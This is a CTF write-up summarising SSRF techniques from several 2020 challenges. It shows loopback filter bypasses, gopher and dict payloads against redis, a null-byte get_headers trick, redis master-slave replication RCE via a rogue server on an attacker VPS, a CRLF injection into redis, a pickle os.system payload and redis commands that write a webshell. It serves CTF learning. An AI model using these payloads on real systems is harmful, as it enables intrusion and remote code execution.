A summary of SSRF techniques seen in recent CTF challenges

网鼎杯 2020 玄武组 SSRFMe

Part 1

A hint tells us to request hint.php from localhost. The code that checks the format of the requested URL:

function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
        die('url fomat error');
    }
    try
    {
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

The check converts the resolved IP to an integer and compares right-shifted prefixes. Ways to bypass it:

1.http://0.0.0.0/hint.php (0.0.0.0 falls outside every blocked range, but on Linux connecting to it reaches the local machine)

2.http://0x7f000001/hint.php (ip2long() fails on the hex string so the check passes, while curl still dereferences it as 127.0.0.1)

3.http://@127.0.0.1./hint.php (this worked during the competition, but not on BUU)
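To see why the first two forms dodge the prefix comparison, here is a small Python illustration (not part of the challenge):

```python
import ipaddress

# 0x7f000001 is the loopback address written as a single 32-bit integer;
# curl happily dereferences this form, but PHP's ip2long('0x7f000001')
# returns false, so the blacklist comparison never fires
print(ipaddress.ip_address(0x7f000001))  # 127.0.0.1

# 0.0.0.0 is outside every blocked range, yet on Linux connecting to it
# reaches the local machine
print(ipaddress.ip_address(0))           # 0.0.0.0
```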

Visiting hint.php reveals the redis password:

if(isset($_POST['file'])){
    file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}

Part 2

Initial probing with dict

Part 1 restricts requests to a protocol whitelist and hands us the redis password, so it is a safe guess that getting a shell means attacking redis.

Request:

?url=dict://0x7f000001:6379/info

The response:

string(73) "-NOAUTH Authentication required.
-NOAUTH Authentication required.
+OK
"

Authentication is required. The dict protocol is convenient here because a plaintext redis command can be appended directly after the /, so try authenticating through dict:

?url=dict://0x7f000001:6379/auth+root

Response:

string(44) "-NOAUTH Authentication required.
+OK
+OK
"

Authentication succeeded.

But dict can only execute a single redis command per request, and since every operation must be preceded by authentication, we need the gopher protocol, which can carry multiple commands in one request.

Probing with gopher

After double URL encoding, a space becomes %2520 and a newline becomes %250a; every command must be terminated with a newline.

Payload:

?url=gopher://0.0.0.0:6379/_AUTH%2520root%250ainfo%250aquit

This returns the redis version among other info:

# Server
redis_version:5.0.3
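A payload like the one above can be generated with Python's urllib.parse.quote applied twice; a minimal sketch (the helper name is mine, not from any tool):

```python
from urllib.parse import quote

def gopher_redis(host, port, commands):
    """Build a gopher:// SSRF payload carrying redis inline commands."""
    # every command must end with a newline so redis treats it as complete
    raw = "\n".join(commands) + "\n"
    # encode twice: once for the ?url= parameter, once for the gopher request
    return f"gopher://{host}:{port}/_" + quote(quote(raw, safe=""), safe="")

payload = gopher_redis("0.0.0.0", 6379, ["AUTH root", "info", "quit"])
print(payload)  # spaces become %2520, newlines %250A
```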

Getting a shell via redis master-slave replication

I won't go into detail here; just use an off-the-shelf replication exploit:

https://github.com/xmsec/redis-ssrf

Edit ssrf-redis.py and set the rogue server's IP and port here:

elif mode==3:
    lhost="174.1.181.41"  # your own (VPS) IP
    lport="6666"          # port the rogue server listens on
    command=input(">")    # command to execute

    cmd=generate_rce(lhost,lport,passwd,command)

......
p = quote(p)  # the commands after gopher:// must be double-encoded
url = "http://730cff09-b621-4d08-b30a-0c4afab78b13.node3.buuoj.cn/?url="+p
res = os.popen("curl {} -v".format(url)).read()
print(res)

I tweaked the script slightly to make the requests more convenient.

Then edit rogue-server.py so its port matches the one set above, upload exp.so and rogue-server.py to the VPS (they must sit in the same directory), and run python rogue-server.py.

Run ssrf-redis.py locally to get the output of the executed command.

One catch: after the first redis connection, later connections report success and are then immediately dropped, so the transfer of exp.so gets cut off partway. Work around this by restarting the rogue server in an infinite loop on the VPS:

#!/bin/bash
while [ "1" = "1" ]
do
    python rogue-server.py
done

GKCTF2020 cve版签到 (CVE check-in)

The page says "You just view *.ctfhub.com"; inspecting the response headers reveals a hint:

Hint: Flag in localhost
Tips: Host must be end with '123'

CVE-2020-7066

PHP's get_headers() function fetches a site's response headers, for example:

<?php

print_r(get_headers('http://www.gtfly.top'));

Result:

Array
(
[0] => HTTP/1.1 200 OK
[1] => Server: nginx/1.10.3 (Ubuntu)
[2] => Date: Sat, 06 Jun 2020 00:38:14 GMT
[3] => Content-Type: text/html
[4] => Content-Length: 6179
[5] => Last-Modified: Fri, 05 Jun 2020 09:38:27 GMT
[6] => Connection: close
[7] => ETag: "5eda1293-1823"
[8] => Accept-Ranges: bytes
)

The CVE description:

In PHP 7.2.x before 7.2.29, 7.3.x before 7.3.16, and 7.4.x before 7.4.4, when get_headers() is used with a user-supplied URL, the URL is silently truncated at a null (\0) character.

For example, testing on PHP 7.3.11:

<?php
echo phpversion()."\n";
print_r(get_headers(urldecode('http://www.gtfly.top%00gtfly')));

Result:

7.3.11
Array
(
[0] => HTTP/1.1 200 OK
[1] => Server: nginx/1.10.3 (Ubuntu)
[2] => Date: Sat, 06 Jun 2020 00:42:17 GMT
[3] => Content-Type: text/html
[4] => Content-Length: 6179
[5] => Last-Modified: Fri, 05 Jun 2020 09:38:27 GMT
[6] => Connection: close
[7] => ETag: "5eda1293-1823"
[8] => Accept-Ranges: bytes
)

So construct:

?url=http://127.0.0.123%00.ctfhub.com

GKCTF2020 EZ三剑客-EzWeb

There is an input box, and the page source hints at ?secret. Visiting it returns ifconfig output, which suggests an internal network. A scan confirms internal hosts, and a port scan turns up 6379, so redis RCE is the likely route.

file:///etc/passwd is filtered, so files can't be read that way, but file:/etc/passwd gets through.

This yields the source:

<?php
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
    $url = $_GET['url'];
    //echo $url."\n";
    if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
    {
        //var_dump($match);
        die('别这样');
    }
    curl($url);
}
if(isset($_GET['secret'])){
    system('ifconfig');
}
?>
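The file:/ bypass is easy to verify against the preg_match blacklist above (ported here to Python purely for illustration):

```python
import re

# the challenge's filter, ported from the PHP preg_match above
blacklist = re.compile(r'file\:\/\/|dict|\.\.\/|127.0.0.1|localhost', re.I | re.S)

print(bool(blacklist.search('file:///etc/passwd')))  # True  -> blocked
print(bool(blacklist.search('file:/etc/passwd')))    # False -> slips through
```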

A redis unauthenticated-access write-shell payload generated with gopherus gets a shell directly; it only needs a single round of URL encoding, no extra encoding of your own.

Note that the shell is written on another internal host, so it must be requested through the input box.

Accessing port 6379 over plain http:

http://173.9.122.11:6379/

returns:

-ERR wrong number of arguments for 'get' command 1

PWNHUB Open 七抓鱼 (online FLAG crawling system)

Address:

http://139.217.102.207:8000/

Register and log in; the SSRF can read files.

/proc/self/cmdline:

/usr/local/python3/bin/python3.5/usr/local/python3/bin/gunicorn--config=config.pyrun:app

Note that the service startup info comes back with no spaces. The app is a Python web service deployed with gunicorn: run.py is the Flask entry script and app is the Flask application instance. Next, read the source.
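The spaces are missing because /proc/pid/cmdline separates arguments with NUL bytes; a quick sketch of restoring them:

```python
# /proc/pid/cmdline joins argv with NUL (\x00) bytes, which render as
# nothing in a browser -- hence the glued-together command line above
raw = (b"/usr/local/python3/bin/python3.5\x00"
       b"/usr/local/python3/bin/gunicorn\x00--config=config.py\x00run:app\x00")
print(raw.replace(b"\x00", b" ").decode().strip())
```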

/proc/self/cwd/run.py:

import pickle
from sipder import Spider
from redis import StrictRedis
from flask import Flask, render_template, redirect, session, request, make_response, url_for, abort, render_template_string
from user import *


app = Flask(__name__)
redis = StrictRedis(host='127.0.0.1',port=6379,db=0)

@app.route('/')
def index():
    cookie = request.cookies.get("Cookie")
    return redirect(url_for("login"))

@app.route('/login/',methods=['GET','POST'])
def login():
    if request.method != 'GET':
        username = request.form.get('username')
        password = request.form.get('password')
        cookie = Cookie()
        cookie.create = username
        cookie = cookie.create
        try:
            # on login, if redis holds a record for this cookie, it gets unpickled
            if redis.exists(cookie):
                user = pickle.loads(redis.get(cookie))
                if user.verify_pass(password):
                    resp = make_response(redirect(url_for('home')))
                    resp.set_cookie('Cookie',cookie)
                    return resp
        except:
            abort(500)
    return render_template("login.html")

@app.route('/register/',methods=['GET','POST'])
def register():
    if request.method != 'GET':
        email = request.form.get('email')
        username = request.form.get('username')
        password = request.form.get('password')
        user = User(email,username,password)
        cookie = Cookie()
        cookie.create = username
        cookie = cookie.create
        try:
            if not redis.exists(cookie):
                redis.set(cookie,pickle.dumps(user)) # on registration, the user object is pickled and stored in redis
                resp = make_response(redirect(url_for('home')))
                resp.set_cookie("Cookie",cookie)
                return resp
        except:
            abort(500)
    return render_template("register.html")

# edit profile info
@app.route('/home/',methods=['GET','POST'])
def home():
    cookie = request.cookies.get('Cookie')
    # if the cookie has the right format and exists in redis, it gets unpickled
    try:
        if Cookie.verify(cookie) and redis.exists(cookie):
            user = redis.get(cookie)
            user = pickle.loads(user)
            if request.method != "GET":
                formlist = request.form.to_dict()
                User.modify_info(user,formlist)
                redis.set(cookie,pickle.dumps(user))
                return render_template("home.html",user=user)
            return render_template("home.html",user=user)
    except:
        return abort(500)
    return redirect(url_for("login"))


@app.route('/spider/',methods=['GET','POST'])
def spider():
    cookie = request.cookies.get('Cookie')
    # same as above
    try:
        if Cookie.verify(cookie) and redis.exists(cookie):
            user = redis.get(cookie)
            user = pickle.loads(user)
    except:
        return abort(500)
    result=''
    if request.method == "GET":
        result=''
    elif request.method != "GET" and request.form.get('url')!=None:
        try:
            target_url = request.form.get('url')
            new_spider = Spider(target_url)
            result = new_spider.spiderFlag()
        except Excetion as e:
            result = e
    return render_template("spider.html",result=str(result),user=user)

@app.route('/testSpider/')
def TSpider():
    html = '<div id="flag">Flag{hahaha This is a test for tested Spider mode}</div>'
    return render_template_string(html)


@app.route('/logout/')
def logout():
    resp = make_response(redirect(url_for('login')))
    resp.set_cookie('Cookie','')
    return resp

@app.errorhandler(500)
def error(e):
    return render_template("error.html")

if __name__ == "__main__":
    app.run(
        debug=True,
        port=5000,
        host="0.0.0.0"
    )

user.py:

'''
-------------------------------------------------
File name : run.py
Description : user model and Cookie model
Author : RGDZ
Date : 2019/04/30
-------------------------------------------------
Version : v1.0
Contact : rgdz.gzu@qq.com
License : (C)Copyright 2018-2019
-------------------------------------------------
'''
from hashlib import md5

# here put the import lib
class User(object):
    def __init__(self,email,username,password):
        self.email = email
        self.username = username
        self.password = md5(password.encode(encoding='utf8')).hexdigest()
        self.phone = None
        self.qqnumber = None
        self.intro = None

    def verify_pass(self,password):
        if password and md5(password.encode(encoding='utf8')).hexdigest() == self.password:
            return True
        return None

    # the dict argument is attacker-controlled
    @staticmethod
    def modify_info(obj,dict):
        for key in dict:
            if hasattr(obj,key) and dict[key]!='':
                setattr(obj,key,dict[key])



class Cookie(object):
    __key = "abcd"
    def __init__(self):
        __key = "abcd"

    @property
    def create(self):
        self.mix_str = (self.username+Cookie.__key).encode(encoding="utf8")
        self.md5_str = self.username+md5(self.mix_str).hexdigest()
        return self.md5_str

    @create.setter
    def create(self,username):
        self.username = username

    @staticmethod
    def verify(verify_cookie):
        if verify_cookie:
            username = verify_cookie[:-32]
            verify_str = verify_cookie[-32:]
            # md5 of (everything before the last 32 chars + "abcd") must equal the last 32 chars
            return md5((username+Cookie.__key).encode(encoding="utf8")).hexdigest()==verify_str
        return None
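Since Cookie.__key is hard-coded as "abcd", anyone can mint a cookie that passes Cookie.verify(); a standalone sketch (function names are mine):

```python
from hashlib import md5

KEY = "abcd"  # Cookie.__key, hard-coded in user.py

def forge_cookie(username):
    # mirrors Cookie.create: username + md5(username + key)
    return username + md5((username + KEY).encode("utf8")).hexdigest()

def verify(cookie):
    # mirrors Cookie.verify: the trailing 32 hex chars must match
    return md5((cookie[:-32] + KEY).encode("utf8")).hexdigest() == cookie[-32:]

c = forge_cookie("admin")
print(c, verify(c))
```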

sipder.py:

import urllib
import urllib.request

from bs4 import BeautifulSoup


class Spider:
    def __init__(self, url):
        self.target_url = url

    def __getResponse(self):
        try:
            info = urllib.request.urlopen(self.target_url).read().decode("utf-8")
            return (info, True)
        except Exception as err:
            return (err, False)

    def spiderFlag(self):
        infos = self.__getResponse()
        if infos[1]:
            soup = BeautifulSoup(infos[0])
            flag = soup.find(id=='flag')
            return infos[0]
            return flag.text
        return infos[0]

The spider fetches URLs with the urllib library. urllib has known CRLF HTTP-header-injection vulnerabilities: CVE-2016-5699 from 2016, and the newer CVE-2019-9740 from 2019. That makes a CRLF attack against the internal redis possible.
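A hedged sketch of what the injected URL handed to the spider could look like (the key name and pickle blob are placeholders, not real values):

```python
from urllib.parse import quote

# literal CR/LF in the URL: on a vulnerable urllib, these bytes reach
# redis verbatim, and redis parses each line as an inline command
redis_cmds = "\r\nSET some_cookie_key PICKLE_PAYLOAD_PLACEHOLDER\r\nQUIT\r\n"
spider_url = "http://127.0.0.1:6379/?" + redis_cmds

# the form field itself is percent-encoded once when POSTed to /spider/
form_value = quote(spider_url, safe="")
print(form_value)
```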

The StrictRedis() call passes no password argument, so redis is unauthenticated; we can therefore overwrite a stored key with a malicious pickle and trigger RCE when it is deserialized on the next page view.

import cPickle
import os

class exp(object):
    def __reduce__(self):
        s = "ls > /tmp/res"
        return (os.system, (s,))

e = exp()
s = cPickle.dumps(e)
print(s)

After overwriting the stored session value, refresh the page to trigger the deserialization, then read /tmp/res directly via file://.

Tooling roundup

1.https://github.com/tarunkant/Gopherus

For MySQL it can build a shell-writing payload; for redis it can build payloads that write a crontab entry or a PHP webshell.

2.https://github.com/xmsec/redis-ssrf

Performs the redis master-slave replication attack directly.

3.https://github.com/firebroo/sec_tools

It can sniff a network interface and encode the captured MySQL/redis operations; you can also feed it redis commands directly to encode.

Methodology roundup

1.Check the target's SSRF restrictions and the PHP/Python version; see whether file:// can retrieve source code and whether the host can reach the internet.

2.Check whether CVEs such as the get_headers() truncation or a CRLF injection apply.

3.Check the redis/MySQL version. If the server isn't CentOS, skip the crontab reverse-shell trick; if redis isn't 4.x-5.x, master-slave replication RCE won't work.

4.Verify file read/write permissions; common commands:

# the PHP code to write
set x "<?=phpinfo();?>"
# set the dump filename
config set dbfilename xxx
# set the dump directory
config set dir xxx
# read back the directory
config get dir
# read back the filename
config get dbfilename
# write the file to disk
save
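These inline commands can equally be packed into one gopher payload as RESP, the redis wire protocol that tools like gopherus emit; a minimal encoder sketch (paths and filenames are examples only):

```python
def resp(*args):
    # encode one command as a RESP array of bulk strings
    out = "*%d\r\n" % len(args)
    for a in args:
        out += "$%d\r\n%s\r\n" % (len(a), a)  # len() assumes ASCII args
    return out

payload = "".join([
    resp("set", "x", "<?=phpinfo();?>"),
    resp("config", "set", "dir", "/var/www/html"),    # example web root
    resp("config", "set", "dbfilename", "shell.php"), # example filename
    resp("save"),
])
print(repr(payload))
```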

5.redis master-slave replication RCE, pickle deserialization, attacking FastCGI…